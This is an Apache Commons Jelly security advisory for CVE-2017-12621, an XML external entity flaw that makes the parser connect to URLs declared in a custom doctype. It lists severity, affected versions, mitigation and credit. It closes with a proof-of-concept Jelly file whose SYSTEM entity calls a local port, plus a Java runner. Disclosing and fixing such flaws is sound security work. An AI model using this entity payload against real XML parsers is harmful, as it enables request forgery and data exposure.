Security Reports

This page lists all security vulnerabilities fixed in released versions of Apache Commons Jelly. Each vulnerability is given a security impact rating by the development team - please note that this rating may vary from platform to platform. We also list the versions of Commons Jelly the flaw is known to affect, and where a flaw has not been verified list the version with a question mark.

Please note that binary patches are never provided. If you need to apply a source code patch, use the building instructions for the Commons Jelly version that you are using.

If you need help on building Commons Jelly or other help on following the instructions to mitigate the known vulnerabilities listed here, please send your questions to the public Commons Users mailing list.

If you have encountered an unlisted security vulnerability or other unexpected behaviour that has security impact, or if the descriptions here are incomplete, please report them privately to the Apache Security Team. Thank you.

For information about reporting or asking questions about security problems, please see the security page of the Apache Commons project.

Fixed in Apache Commons Jelly 1.0.1

CVE-2017-12621. Apache Commons Jelly connects to url with certain custom doctype definitions.

Severity: Medium

Vendor: The Apache Software Foundation

Versions Affected: commons-jelly-1.0 (core), namely commons-jelly-1.0.jar

Description: During jelly (xml) file parsing with xerces, if a custom doctype entity is declared with a ?SYSTEM? entity with a url and that entity is used in the body of the jelly file, during parser instantiation the parser will attempt to connect to said url. This could be a cross site scripting concern. The Open Web Application Security Project suggests that the fix be https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#XMLReader

Mitigation: 1.0 users should migrate to 1.0.1.

Credit: This was discovered by Luca Carettoni of Doyensec.

Example:

example.jelly 
<?xml version="1.0"?>
<!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY sp SYSTEM "http://127.0.0.1:4444/">
    ]>
<r>&sp;</r>
<j:jelly trim="false" xmlns:j="jelly:core"
         xmlns:x="jelly:xml"
         xmlns:html="jelly:html">
</j:jelly>
ExampleParser.java 
public class ExampleParser {
    public static void main(String[] args) throws JellyException, IOException,
                    NoSuchMethodException, IllegalAccessException,IllegalArgumentException,
                    InvocationTargetException {
        JellyContext context = new JellyContext();
        context.runScript("example.jelly", null);
    }
}